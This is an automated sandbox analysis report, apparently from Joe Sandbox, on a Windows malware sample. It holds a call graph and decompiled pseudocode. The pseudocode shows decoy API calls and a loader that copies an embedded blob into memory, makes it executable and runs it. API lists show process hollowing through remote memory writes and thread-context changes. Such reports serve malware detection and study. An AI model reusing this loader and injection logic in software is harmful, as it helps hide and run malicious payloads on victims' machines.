30086a4 19305->19306 19307 3006891 __freea 66 API calls 19306->19307 19308 30086b2 19307->19308 19309 3006891 __freea 66 API calls 19308->19309 19310 30086bd 19309->19310 19311 3006891 __freea 66 API calls 19310->19311 19312 30086c8 19311->19312 19313 3006891 __freea 66 API calls 19312->19313 19314 30086d3 19313->19314 19315 3006891 __freea 66 API calls 19314->19315 19316 30086de 19315->19316 19317 3006891 __freea 66 API calls 19316->19317 19318 30086e9 19317->19318 19319 3006891 __freea 66 API calls 19318->19319 19320 30086f4 19319->19320 19321 3006891 __freea 66 API calls 19320->19321 19322 30086ff 19321->19322 19323 3006891 __freea 66 API calls 19322->19323 19324 300870a 19323->19324 19325 3006891 __freea 66 API calls 19324->19325 19326 3008715 19325->19326 19327 3006891 __freea 66 API calls 19326->19327 19328 3008720 19327->19328 19329 3006891 __freea 66 API calls 19328->19329 19330 300872b 19329->19330 19331 3006891 __freea 66 API calls 19330->19331 19332 3008736 19331->19332 19333 3006891 __freea 66 API calls 19332->19333 19334 3008741 19333->19334 19335 3006891 __freea 66 API calls 19334->19335 19336 300874c 19335->19336 19337 3006891 __freea 66 API calls 19336->19337 19338 3008757 19337->19338 19339 3006891 __freea 66 API calls 19338->19339 19340 3008765 19339->19340 19341 3006891 __freea 66 API calls 19340->19341 19342 3008770 19341->19342 19343 3006891 __freea 66 API calls 19342->19343 19344 300877b 19343->19344 19345 3006891 __freea 66 API calls 19344->19345 19346 3008786 19345->19346 19347 3006891 __freea 66 API calls 19346->19347 19348 3008791 19347->19348 19349 3006891 __freea 66 API calls 19348->19349 19350 300879c 19349->19350 19351 3006891 __freea 66 API calls 19350->19351 19352 30087a7 19351->19352 19353 3006891 __freea 66 API calls 19352->19353 19354 30087b2 19353->19354 19355 3006891 __freea 66 API calls 19354->19355 19356 30087bd 19355->19356 19357 3006891 __freea 66 API calls 19356->19357 19358 30087c8 19357->19358 19359 3006891 __freea 66 API calls 19358->19359 19360 30087d3 19359->19360 19361 3006891 __freea 66 API calls 19360->19361 19362 30087de 19361->19362 19363 3006891 __freea 66 API calls 19362->19363 19364 30087e9 19363->19364 19365 3006891 __freea 66 API calls 19364->19365 19366 30087f4 19365->19366 19367 3006891 __freea 66 API calls 19366->19367 19368 30087ff 19367->19368 19369 3006891 __freea 66 API calls 19368->19369 19370 300880a 19369->19370 19371 3006891 __freea 66 API calls 19370->19371 19372 3008818 19371->19372 19373 3006891 __freea 66 API calls 19372->19373 19374 3008823 19373->19374 19375 3006891 __freea 66 API calls 19374->19375 19376 300882e 19375->19376 19377 3006891 __freea 66 API calls 19376->19377 19378 3008839 19377->19378 19379 3006891 __freea 66 API calls 19378->19379 19380 3008844 19379->19380 19381 3006891 __freea 66 API calls 19380->19381 19381->19382 19382->19152 19383->19124 19387 3006db5 LeaveCriticalSection 19384->19387 19386 3006139 19386->19102 19387->19386 19389 3005c5f 19388->19389 19390 3005c50 19388->19390 19392 3003ea5 __freea 66 API calls 19389->19392 19393 3005c7d 19389->19393 19391 3003ea5 __freea 66 API calls 19390->19391 19395 3005c55 19391->19395 19394 3005c70 19392->19394 19393->19057 19396 3003e53 __cftof 11 API calls 19394->19396 19395->19057 19396->19395 19398 30068ee __getbuf 66 API calls 19397->19398 19399 3005c0f 19398->19399 19399->19049 19401 3005b32 __CxxUnhandledExceptionFilter 19400->19401 19402 3005b3a 19401->19402 19406 3005b55 19401->19406 19450 3003eb8 19402->19450 19404 3005b61 19407 3003eb8 66 API calls 19404->19407 19406->19404 19408 3005b9b 19406->19408 19410 3005b66 19407->19410 19453 3007cd1 19408->19453 19409 3003ea5 __freea 66 API calls 19420 3005b47 __CxxUnhandledExceptionFilter 19409->19420 19412 3003ea5 __freea 66 API calls 19410->19412 19414 3005b6e 19412->19414 19413 3005ba1 19415 3005baf 19413->19415 19416 3005bc3 19413->19416 19417 3003e53 __cftof 11 API calls 19414->19417 19463 3005429 19415->19463 19419 3003ea5 __freea 66 API calls 19416->19419 19417->19420 19421 3005bc8 19419->19421 19420->19048 19422 3003eb8 66 API calls 19421->19422 19423 3005bbb 19422->19423 19522 3005bf2 19423->19522 19426 300534b __CxxUnhandledExceptionFilter 19425->19426 19427 300535c 19426->19427 19430 3005378 19426->19430 19429 3003eb8 66 API calls 19427->19429 19428 3005384 19431 3003eb8 66 API calls 19428->19431 19432 3005361 19429->19432 19430->19428 19434 30053be 19430->19434 19433 3005389 19431->19433 19435 3003ea5 __freea 66 API calls 19432->19435 19436 3003ea5 __freea 66 API calls 19433->19436 19437 3007cd1 68 API calls 19434->19437 19446 3005369 __CxxUnhandledExceptionFilter 19435->19446 19438 3005391 19436->19438 19439 30053c4 19437->19439 19440 3003e53 __cftof 11 API calls 19438->19440 19441 30053ee 19439->19441 19442 30053d2 19439->19442 19440->19446 19443 3003ea5 __freea 66 API calls 19441->19443 19444 30052ba 68 API calls 19442->19444 19445 30053f3 19443->19445 19447 30053e3 19444->19447 19448 3003eb8 66 API calls 19445->19448 19446->19048 19561 300541f 19447->19561 19448->19447 19451 3004cc7 __getptd 66 API calls 19450->19451 19452 3003ebd 19451->19452 19452->19409 19454 3007cdd __CxxUnhandledExceptionFilter 19453->19454 19455 3007d37 19454->19455 19458 3006e8e ___crtLCMapStringA 66 API calls 19454->19458 19456 3007d3c EnterCriticalSection 19455->19456 19457 3007d59 __CxxUnhandledExceptionFilter 19455->19457 19456->19457 19457->19413 19459 3007d09 19458->19459 19460 3007d12 InitializeCriticalSectionAndSpinCount 19459->19460 19462 3007d25 19459->19462 19460->19462 19525 3007d67 19462->19525 19464 3005438 19463->19464 19465 300546e 19464->19465 19468 300548d 19464->19468 19496 3005463 19464->19496 19467 3003eb8 66 API calls 19465->19467 19466 3006ba0 setSBUpLow 5 API calls 19470 3005b24 19466->19470 19471 3005473 19467->19471 19469 30054cc 19468->19469 19474 30054e9 19468->19474 19472 3003eb8 66 API calls 19469->19472 19470->19423 19473 3003ea5 __freea 66 API calls 19471->19473 19475 30054d1 19472->19475 19477 300547a 19473->19477 19480 30054fc 19474->19480 19529 30052ba 19474->19529 19479 3003ea5 __freea 66 API calls 19475->19479 19482 3003e53 __cftof 11 API calls 19477->19482 19478 3005c43 66 API calls 19481 3005505 19478->19481 19483 30054d9 19479->19483 19480->19478 19484 30057a7 19481->19484 19488 3004d40 __getptd 66 API calls 19481->19488 19482->19496 19485 3003e53 __cftof 11 API calls 19483->19485 19486 3005a57 WriteFile 19484->19486 19487 30057b6 19484->19487 19485->19496 19489 3005a8a GetLastError 19486->19489 19515 3005789 19486->19515 19490 3005871 19487->19490 19505 30057c9 19487->19505 19491 3005520 GetConsoleMode 19488->19491 19489->19515 19492 300587e 19490->19492 19502 300594b 19490->19502 19491->19484 19493 3005549 19491->19493 19494 3005ad5 19492->19494 19500 30058ed WriteFile 19492->19500 19492->19515 19493->19484 19495 3005559 GetConsoleCP 19493->19495 19494->19496 19499 3003ea5 __freea 66 API calls 19494->19499 19495->19515 19521 300557c 19495->19521 19496->19466 19497 3005aa8 19503 3005ac7 19497->19503 19504 3005ab3 19497->19504 19498 3005813 WriteFile 19498->19489 19498->19505 19506 3005af8 19499->19506 19500->19489 19500->19492 19501 30059bc WideCharToMultiByte 19501->19489 19508 30059f3 WriteFile 19501->19508 19502->19494 19502->19501 19502->19508 19502->19515 19542 3003ecb 19503->19542 19507 3003ea5 __freea 66 API calls 19504->19507 19505->19494 19505->19498 19505->19515 19510 3003eb8 66 API calls 19506->19510 19511 3005ab8 19507->19511 19508->19502 19512 3005a2a GetLastError 19508->19512 19510->19496 19513 3003eb8 66 API calls 19511->19513 19512->19502 19513->19496 19515->19494 19515->19496 19515->19497 19516 3007d97 WriteConsoleW CreateFileW 19516->19521 19517 3005628 WideCharToMultiByte 19517->19515 19519 3005659 WriteFile 19517->19519 19518 3007eef 78 API calls __Stoull 19518->19521 19519->19489 19519->19521 19520 30056ad WriteFile 19520->19489 19520->19521 19521->19489 19521->19515 19521->19516 19521->19517 19521->19518 19521->19520 19539 3006b8d 19521->19539 19560 3007d70 LeaveCriticalSection 19522->19560 19524 3005bf8 19524->19420 19528 3006db5 LeaveCriticalSection 19525->19528 19527 3007d6e 19527->19455 19528->19527 19547 3007c68 19529->19547 19531 30052d8 19532 30052e0 19531->19532 19533 30052f1 SetFilePointer 19531->19533 19534 3003ea5 __freea 66 API calls 19532->19534 19535 3005309 GetLastError 19533->19535 19536 30052e5 19533->19536 19534->19536 19535->19536 19537 3005313 19535->19537 19536->19480 19538 3003ecb 66 API calls 19537->19538 19538->19536 19540 3006b55 __isleadbyte_l 76 API calls 19539->19540 19541 3006b9c 19540->19541 19541->19521 19543 3003eb8 66 API calls 19542->19543 19544 3003ed6 __freea 19543->19544 19545 3003ea5 __freea 66 API calls 19544->19545 19546 3003ee9 19545->19546 19546->19496 19548 3007c8d 19547->19548 19549 3007c75 19547->19549 19552 3003eb8 66 API calls 19548->19552 19554 3007ccc 19548->19554 19550 3003eb8 66 API calls 19549->19550 19551 3007c7a 19550->19551 19553 3003ea5 __freea 66 API calls 19551->19553 19555 3007c9e 19552->19555 19559 3007c82 19553->19559 19554->19531 19556 3003ea5 __freea 66 API calls 19555->19556 19557 3007ca6 19556->19557 19558 3003e53 __cftof 11 API calls 19557->19558 19558->19559 19559->19531 19560->19524 19564 3007d70 LeaveCriticalSection 19561->19564 19563 3005427 19563->19446 19564->19563

    Executed Functions

    Function 0300966F, Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 139
    C-Code - Quality: 73%
    			E0300966F(void* __eflags) {
				char _v5;
				long _v12;
				long _v16;
				int _v20;
				int _v24;
				char _v28;
				void* _v32;
				struct tagPIXELFORMATDESCRIPTOR _v72;
				void* _t41;
				long _t47;
				int _t49;
				void* _t50;
				intOrPtr* _t58;
				long _t65;
				long _t69;
				int _t73;
				void* _t79;
				int _t80;

				_t41 = E03002C60(0x300cb48);
				_t80 = 0;
				if(_t41 > 0x1b3 && _v72.cStencilBits != 0x84b9b && _v72.cStencilBits != 0x1104) {
					E0300958A(_t41);
					ShellExecuteA(0, 0, 0, 0, 0, 0);
					ShellAboutW(0, 0, 0, 0);
					ExtractIconA(0, 0, 0);
					_push("osurhfoiuasdf asdiuyfghas dofioaysgfuioaysdgf");
					_push(0x300cb48);
					E03002BD0();
				}
				_v12 = 1;
				_v12 = 0x583e9;
				GetColorSpace(_t80);
				GetLogColorSpaceA(_t80, _t80, _t80);
				ChoosePixelFormat(_t80,  &_v72); // executed
				SetICMMode(_t80, _t80);
				_v20 = _t80;
				_v24 = _t80;
				do {
					_t47 = GetPrivateProfileSectionNamesA(0x300cb48, _t80, "doifughsg siodufhg sdfoughjsiopdfughj"); // executed
					_t65 = _t47;
					__imp__GetCalendarInfoW(_t80, _t80, _t80, _t80, _t80,  &_v28); // executed
					_t49 = GetLocaleInfoW(_t80, _t80, 0x300cf50, _t80);
					if(_v20 > 0x7530 && _t65 != 0x6f6f3 && _v28 != 0x4278f9 && _t49 != 0x176cf5a) {
						_v24 = 0x6f;
						 *0x300cf48 = GetModuleHandleW(L"kernel32.dll");
					}
					_v20 = _v20 + 1;
				} while (_v24 != 0x6f);
				_t50 = LocalAlloc(_t80, _v12); // executed
				_v24 = 0x30142d8;
				_t73 = _v24;
				_t79 = _t50;
				_t69 = 0;
				_v32 = _t79;
				if(_v12 > _t80) {
					_v20 = 0xfffffffe;
					_v20 = _v20 - _t73;
					_t23 = _t73 + 2; // 0x30142da
					_t58 = _t23;
					do {
						_t24 = _t58 - 1; // 0x586416a5
						_v5 =  *_t58;
						_t26 = _t58 - 2; // 0x6416a5c8
						 *((char*)(_t69 + _t79)) =  *_t26;
						 *((char*)(_t69 + _t79 + 1)) =  *_t24;
						 *((char*)(_t69 + _t79 + 2)) = _v5;
						_t58 = _t58 + 3;
						_t69 = _t69 + 3;
					} while (_v20 + _t58 < _v12);
				}
				_v12 = _t69;
				VirtualProtect(_t79, 0x583e9, 0x40,  &_v16); // executed
				if(_v12 > _t80) {
					do {
						GetTickCount();
						_t80 = _t80 + 1;
					} while (_t80 < _v12);
				}
				E03009651( &_v12, _t79);
				_v32();
				return 0;
			}





















    0x0300967e
    0x03009683
    0x0300968b
    0x0300969f
    0x030096aa
    0x030096b4
    0x030096bd
    0x030096c3
    0x030096c8
    0x030096c9
    0x030096cf
    0x030096d0
    0x030096d7
    0x030096df
    0x030096e8
    0x030096f3
    0x030096fb
    0x03009701
    0x03009704
    0x03009707
    0x0300970e
    0x03009714
    0x0300971f
    0x0300972d
    0x0300973a
    0x03009759
    0x03009766
    0x03009766
    0x0300976b
    0x0300976e
    0x03009778
    0x0300977e
    0x03009785
    0x03009788
    0x0300978a
    0x0300978c
    0x03009792
    0x03009794
    0x0300979b
    0x0300979e
    0x0300979e
    0x030097a1
    0x030097a3
    0x030097a6
    0x030097a9
    0x030097ac
    0x030097af
    0x030097b6
    0x030097bd
    0x030097c2
    0x030097c5
    0x030097a1
    0x030097d6
    0x030097d9
    0x030097e2
    0x030097e4
    0x030097e4
    0x030097ea
    0x030097eb
    0x030097e4
    0x030097f5
    0x030097fa
    0x03009803

    APIs
    • _strlen.LIBCMT ref: 0300967E
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
    • ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
    • ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
    • GetColorSpace.GDI32(00000000), ref: 030096DF
    • GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
    • ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
    • SetICMMode.GDI32(00000000,00000000), ref: 030096FB
    • GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
    • GetCalendarInfoW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
    • GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
    • LocalAlloc.KERNELBASE(00000000,000583E9), ref: 03009778
    • VirtualProtect.KERNELBASE(00000000,000583E9,00000040,?), ref: 030097D9
    • GetTickCount.KERNEL32 ref: 030097E4
      • Part of subcall function 0300958A: WinHttpCloseHandle.WINHTTP(00000000,00000000,030096A4), ref: 0300958E
      • Part of subcall function 0300958A: WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000), ref: 03009598
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0027E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0027E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0027E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0027E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0027E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0027E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0027E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0027E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0027E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0027E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0027E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0027E35A
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    Function 03003F30, Relevance: 1.5, APIs: 1, Instructions: 4
    C-Code - Quality: 100%
    			E03003F30() {

				SetUnhandledExceptionFilter(E03003EEE); // executed
				return 0;
			}



    0x03003f35
    0x03003f3d

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00003EEE), ref: 03003F35
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03004E89, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109
    C-Code - Quality: 51%
    			E03004E89(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t17;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr* _t23;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x300c63c = GetProcAddress(_t35, "FlsAlloc");
					 *0x300c640 = GetProcAddress(_t35, "FlsGetValue");
					 *0x300c644 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x300c63c;
					_t39 = TlsSetValue;
					 *0x300c648 = _t7;
					if( *0x300c63c == 0) {
						L6:
						 *0x300c640 = TlsGetValue;
						 *0x300c63c = E03004B99;
						 *0x300c644 = _t39;
						 *0x300c648 = TlsFree;
					} else {
						__eflags =  *0x300c640;
						if( *0x300c640 == 0) {
							goto L6;
						} else {
							__eflags =  *0x300c644;
							if( *0x300c644 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x300b1c4 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x300c640);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E03003F93();
							_t41 = __imp__EncodePointer; // executed
							_t14 =  *_t41( *0x300c63c); // executed
							 *0x300c63c = _t14; // executed
							_t15 =  *_t41( *0x300c640); // executed
							 *0x300c640 = _t15; // executed
							_t16 =  *_t41( *0x300c644); // executed
							 *0x300c644 = _t16; // executed
							_t17 =  *_t41( *0x300c648); // executed
							 *0x300c648 = _t17;
							_t18 = E03006D14();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E03004BD6();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t20 =  *_t36( *0x300c63c, E03004D5A); // executed
								_t21 =  *_t20();
								 *0x300b1c0 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E03006933(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_t23 =  *_t36( *0x300c644,  *0x300b1c0, _t42); // executed
										__eflags =  *_t23();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E03004C13(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E03004BD6();
					return 0;
				}
			}
























    0x03004e89
    0x03004e97
    0x03004e9b
    0x03004ebb
    0x03004ec8
    0x03004ed5
    0x03004eda
    0x03004edc
    0x03004ee3
    0x03004ee9
    0x03004eee
    0x03004f06
    0x03004f0b
    0x03004f15
    0x03004f1f
    0x03004f25
    0x03004ef0
    0x03004ef0
    0x03004ef7
    0x00000000
    0x03004ef9
    0x03004ef9
    0x03004f00
    0x00000000
    0x03004f02
    0x03004f02
    0x03004f04
    0x00000000
    0x00000000
    0x03004f04
    0x03004f00
    0x03004ef7
    0x03004f2a
    0x03004f30
    0x03004f35
    0x03004f38
    0x03004fff
    0x03004fff
    0x03004fff
    0x03004f3e
    0x03004f45
    0x03004f47
    0x03004f49
    0x00000000
    0x03004f4f
    0x03004f4f
    0x03004f5a
    0x03004f60
    0x03004f68
    0x03004f6d
    0x03004f75
    0x03004f7a
    0x03004f82
    0x03004f87
    0x03004f89
    0x03004f8e
    0x03004f93
    0x03004f95
    0x03004ffa
    0x03004ffa
    0x00000000
    0x03004f97
    0x03004f97
    0x03004fa8
    0x03004faa
    0x03004fac
    0x03004fb1
    0x03004fb4
    0x00000000
    0x03004fb6
    0x03004fc2
    0x03004fc6
    0x03004fc8
    0x00000000
    0x03004fca
    0x03004fd7
    0x03004fdb
    0x03004fdd
    0x00000000
    0x03004fdf
    0x03004fdf
    0x03004fe1
    0x03004fe2
    0x03004fe9
    0x03004fef
    0x03004ff3
    0x03004ff7
    0x03004ff7
    0x03004fdd
    0x03004fc8
    0x03004fb4
    0x03004f95
    0x03004f49
    0x03005003
    0x03004e9d
    0x03004e9d
    0x03004ea5
    0x03004ea5

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
    • TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
    • TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03006D14: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 03006D3C
    • DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    • GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
      • Part of subcall function 03004BD6: DecodePointer.KERNEL32(00000003,03004FFF,?,03002D9E), ref: 03004BE7
      • Part of subcall function 03004BD6: TlsFree.KERNEL32(00000014,03004FFF,?,03002D9E), ref: 03004C01
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(00000014,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006DA5
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03002D14, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98
    C-Code - Quality: 57%
    			E03002D14() {
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				void* _t43;
				signed int _t45;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				intOrPtr _t60;
				void* _t61;

				_push(0x58);
				_push(0x3009808);
				E03005030(_t43, _t56, _t57);
				GetStartupInfoW(_t59 - 0x68);
				_t60 =  *0x301309c; // 0x0
				if(_t60 == 0) {
					__imp__HeapSetInformation(0, 1, 0, 0);
				}
				_t61 =  *0x3000000 - 0x5a4d; // 0x5a4d
				if(_t61 == 0) {
					_t22 =  *0x300003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t22 + 0x3000000)) - 0x4550;
					if( *((intOrPtr*)(_t22 + 0x3000000)) != 0x4550) {
						goto L3;
					} else {
						__eflags =  *((intOrPtr*)(_t22 + 0x3000018)) - 0x10b;
						if( *((intOrPtr*)(_t22 + 0x3000018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t22 + 0x3000074)) - 0xe;
							if( *((intOrPtr*)(_t22 + 0x3000074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t22 + 0x30000e8);
								_t8 =  *(_t22 + 0x30000e8) != 0;
								__eflags = _t8;
								 *(_t59 - 0x1c) = 0 | _t8;
							}
						}
					}
				} else {
					L3:
					 *(_t59 - 0x1c) = 0;
				}
				if(E03005004() == 0) {
					E03002CEB(0x1c);
				}
				if(E03004E89(_t43) == 0) {
					E03002CEB(0x10);
				}
				E03004B44();
				 *((intOrPtr*)(_t59 - 4)) = 0;
				_t26 = E030048FF(); // executed
				_t64 = _t26;
				if(_t26 < 0) {
					_push(0x1b);
					E0300420B(_t55, _t64);
				}
				 *0x3013098 = GetCommandLineW();
				 *0x300bdc4 = E030048A7();
				_t29 = E030047F9();
				_t65 = _t29;
				if(_t29 < 0) {
					_push(8);
					_t29 = E0300420B(_t55, _t65);
				}
				_t30 = E030045C7(_t29, _t43);
				_t66 = _t30;
				if(_t30 < 0) {
					_push(9);
					E0300420B(_t55, _t66);
				}
				_t31 = E03003FEA(_t56, 0, 1); // executed
				_t67 = _t31;
				if(_t31 != 0) {
					_push(_t31);
					E0300420B(_t55, _t67);
				}
				_t32 = E03004581();
				_t68 =  *(_t59 - 0x3c) & 0x00000001;
				if(( *(_t59 - 0x3c) & 0x00000001) == 0) {
					_t45 = 0xa;
				} else {
					_t45 =  *(_t59 - 0x38) & 0x0000ffff;
				}
				_t33 = E0300966F(_t68, 0x3000000, 0, _t32, _t45); // executed
				 *((intOrPtr*)(_t59 - 0x20)) = _t33;
				if( *(_t59 - 0x1c) == 0) {
					E030041C1(_t33); // executed
				}
				E030041ED();
				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
				return E03005075( *((intOrPtr*)(_t59 - 0x20)));
			}


















    0x03002d14
    0x03002d16
    0x03002d1b
    0x03002d24
    0x03002d2c
    0x03002d32
    0x03002d39
    0x03002d39
    0x03002d44
    0x03002d4b
    0x03002d52
    0x03002d57
    0x03002d61
    0x00000000
    0x03002d63
    0x03002d68
    0x03002d6f
    0x00000000
    0x03002d71
    0x03002d71
    0x03002d78
    0x00000000
    0x03002d7a
    0x03002d7c
    0x03002d82
    0x03002d82
    0x03002d85
    0x03002d85
    0x03002d78
    0x03002d6f
    0x03002d4d
    0x03002d4d
    0x03002d4d
    0x03002d4d
    0x03002d8f
    0x03002d93
    0x03002d98
    0x03002da0
    0x03002da4
    0x03002da9
    0x03002daa
    0x03002daf
    0x03002db2
    0x03002db7
    0x03002db9
    0x03002dbb
    0x03002dbd
    0x03002dc2
    0x03002dc9
    0x03002dd3
    0x03002dd8
    0x03002ddd
    0x03002ddf
    0x03002de1
    0x03002de3
    0x03002de8
    0x03002de9
    0x03002dee
    0x03002df0
    0x03002df2
    0x03002df4
    0x03002df9
    0x03002dfc
    0x03002e02
    0x03002e04
    0x03002e06
    0x03002e07
    0x03002e0c
    0x03002e0d
    0x03002e12
    0x03002e16
    0x03002e20
    0x03002e18
    0x03002e18
    0x03002e18
    0x03002e29
    0x03002e2e
    0x03002e34
    0x03002e37
    0x03002e37
    0x03002e3c
    0x03002e71
    0x03002e80

    APIs
    • GetStartupInfoW.KERNEL32(?,03009808,00000058), ref: 03002D24
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 03002D39
      • Part of subcall function 03005004: HeapCreate.KERNELBASE(00000000,00001000,00000000,03002D8D), ref: 0300500D
      • Part of subcall function 03004E89: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
      • Part of subcall function 03004E89: TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
      • Part of subcall function 03004E89: TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
